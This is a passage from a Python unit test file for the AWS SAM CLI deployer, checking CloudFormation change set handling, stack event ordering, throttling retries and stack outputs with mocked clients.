capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
RoleARN="role-arn",
NotificationARNs=[],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
# assert that the arguments; Capabilities, RoleARN & NotificationARNs are not passed through if no values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=None,
role_arn=None,
notification_arns=None,
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_describe_changeset_with_changes(self):
response = [
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Action": "Add"}}
]
},
]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(
changes,
{
"Add": [
{"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Replacement": "N/A"},
],
"Modify": [],
"Remove": [],
},
)
def test_describe_changeset_with_no_changes(self):
response = [{"Changes": []}]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(changes, {"Add": [], "Modify": [], "Remove": []})
def test_wait_for_changeset(self):
self.deployer._client.get_waiter = MagicMock(return_value=MockChangesetWaiter())
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_wait_for_changeset_exception_ChangeEmpty(self):
self.deployer._client.get_waiter = MagicMock(
return_value=MockChangesetWaiter(
ex=WaiterError(
name="wait_for_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(ChangeSetError):
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_execute_changeset(self):
self.deployer.execute_changeset("id", "test", True)
self.deployer._client.execute_change_set.assert_called_with(
ChangeSetName="id", StackName="test", DisableRollback=True
)
def test_execute_changeset_exception(self):
self.deployer._client.execute_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="execute_changeset")
)
with self.assertRaises(DeployFailedError):
self.deployer.execute_changeset("id", "test", True)
def test_get_last_event_time(self):
timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(
return_value={"StackEvents": [{"Timestamp": timestamp}]}
)
self.assertEqual(self.deployer.get_last_event_time("test"), utc_to_timestamp(timestamp))
def test_get_last_event_time_unknown_last_time(self):
current_timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(side_effect=KeyError)
# Convert to milliseconds from seconds
last_stack_event_timestamp = to_datetime(self.deployer.get_last_event_time("test") * 1000)
self.assertEqual(last_stack_event_timestamp.year, current_timestamp.year)
self.assertEqual(last_stack_event_timestamp.month, current_timestamp.month)
self.assertEqual(last_stack_event_timestamp.day, current_timestamp.day)
self.assertEqual(last_stack_event_timestamp.hour, current_timestamp.hour)
self.assertEqual(last_stack_event_timestamp.minute, current_timestamp.minute)
self.assertEqual(last_stack_event_timestamp.second, current_timestamp.second)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order_with_previous_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
# Last event (from a former deployment)
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_skip_old_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
sample_events = [
# old deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp - timedelta(seconds=10),
"ResourceStatus": "CREATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
# new deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
]
invalid_event = {"StackEvents": [{}]} # if deployer() loop read this, KeyError would raise
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator([sample_events[0], invalid_event]),
MockPaginator([sample_events[1], sample_events[0], invalid_event]),
MockPaginator([sample_events[2], sample_events[1], invalid_event]),
MockPaginator([sample_events[3], sample_events[2], invalid_event]),
MockPaginator([sample_events[4], sample_events[3], invalid_event]),
MockPaginator([sample_events[5], sample_events[4], invalid_event]),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 4)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[0][1]["columns"],
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[3][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_stop_at_first_not_in_progress(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=33),
"ResourceStatus": "UPDATE_COMLPETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=32),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=31),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_IN_PROGRESS",
},
{
# This event should stop the loop and ignore above events
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 3)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[2][1]["columns"],
)
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_exceptions(self, patched_time, patched_math):
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
]
)
# No exception raised, we return with a log message, this is because,
# the changeset is still getting executed, but displaying them is getting throttled.
self.deployer.describe_stack_events("test", time.time())
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_resume_after_exceptions(self, patched_time, patched_math):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math.pow", wraps=math.pow)
@patch("time.sleep")
def test_describe_stack_events_reset_retry_on_success_after_exceptions(self, patched_time, patched_pow):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
# There are 2 sleep call for exceptions (backoff + regular one at 0)
self.assertEqual(patched_time.call_count, 9)
self.assertEqual(
patched_time.call_args_list,
[call(0.5), call(0.5), call(2.0), call(0), call(4.0), call(0), call(0.5), call(2.0), call(0)],
)
self.assertEqual(patched_pow.call_count, 3)
self.assertEqual(patched_pow.call_args_list, [call(2, 1), call(2, 2), call(2, 1)])
def test_check_stack_status(self):
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("CREATE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("DELETE_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("REVIEW_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("ROLLBACK_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_COMPLETE_CLEANUP_IN_PROGRESS"), False)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_IN_PROGRESS"), False)
self.assertEqual(
self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS"), False
)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_FAILED"), True)
self.assertEqual(self.deployer._check_stack_not_in_progress("UPDATE_ROLLBACK_IN_PROGRESS"), False)
@patch("time.sleep")
def test_wait_for_execute(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer.wait_for_execute("test", "CREATE", False)
self.deployer.wait_for_execute("test", "UPDATE", True)
with self.assertRaises(RuntimeError):
self.deployer.wait_for_execute("test", "DESTRUCT", False)
self.deployer._client.get_waiter = MagicMock(
return_value=MockCreateUpdateWaiter(
ex=WaiterError(
name="create_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(DeployFailedError):
self.deployer.wait_for_execute("test", "CREATE", False)
def test_create_and_wait_for_changeset(self):
self.deployer.create_changeset = MagicMock(return_value=({"Id": "test"}, "create"))
self.deployer.wait_for_changeset = MagicMock()
self.deployer.describe_changeset = MagicMock()
result = self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(result, ({"Id": "test"}, "create"))
def test_create_and_wait_for_changeset_exception(self):
self.deployer.create_changeset = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Something Wrong"}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployFailedError):
self.deployer.create_and_wait_for_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_get_stack_outputs(self):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_get_stack_outputs_no_echo(self, mock_pprint_columns):
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(
outputs["Stacks"][0]["Outputs"], self.deployer.get_stack_outputs(stack_name="test", echo=False)
)
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
self.assertEqual(mock_pprint_columns.call_count, 0)
def test_get_stack_outputs_no_outputs_no_exception(self):
outputs = {"Stacks": [{"SomeOtherKey": "Value"}]}
self.deployer._client.describe_stacks = MagicMock(return_value=outputs)
self.assertEqual(None, self.deployer.get_stack_outputs(stack_name="test"))
self.deployer._client.describe_stacks.assert_called_with(StackName="test")
def test_get_stack_outputs_exception(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="describe_stacks")
)
with self.assertRaises(DeployStackOutPutFailedError):
self.deployer.get_stack_outputs(stack_name="test")
@patch("time.sleep")
def test_wait_for_execute_no_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=None)
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 0)
@patch("time.sleep")
def test_wait_for_execute_with_outputs(self, patched_time):
self.deployer.describe_stack_events = MagicMock()
outputs = {
"Stacks": [
{
"Outputs": [
{"OutputKey": "Key1", "OutputValue": "Value1", "Description": "output for s3"},
{"OutputKey": "Key2", "OutputValue": "Value2", "Description": "output for kms"},
]
}
]
}
self.deployer._client.get_waiter = MagicMock(return_value=MockCreateUpdateWaiter())
self.deployer._display_stack_outputs = MagicMock()
self.deployer.get_stack_outputs = MagicMock(return_value=outputs["Stacks"][0]["Outputs"])
self.deployer.wait_for_execute("test", "CREATE", False)
self.assertEqual(self.deployer._display_stack_outputs.call_count, 1)
def test_sync_update_stack(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.update_stack.call_count, 1)
self.deployer._client.update_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_update_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.update_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_sync_create_stack(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_stack.call_count, 1)
self.deployer._client.create_stack.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_sync_create_stack_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.wait_for_execute = MagicMock()
self.deployer._client.create_stack = MagicMock(side_effect=Exception)
with self.assertRaises(DeployFailedError):
self.deployer.sync(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_process_kwargs(self):
kwargs = {"Capabilities": []}
capabilities = ["CAPABILITY_IAM"]
role_arn = "role-arn"
notification_arns = ["arn"]
expected = {
"Capabilities": ["CAPABILITY_IAM"],
"RoleARN": "role-arn",
"NotificationARNs": ["arn"],
}
result = self.deployer._process_kwargs(kwargs, None, capabilities, role_arn, notification_arns)
self.assertEqual(expected, result)
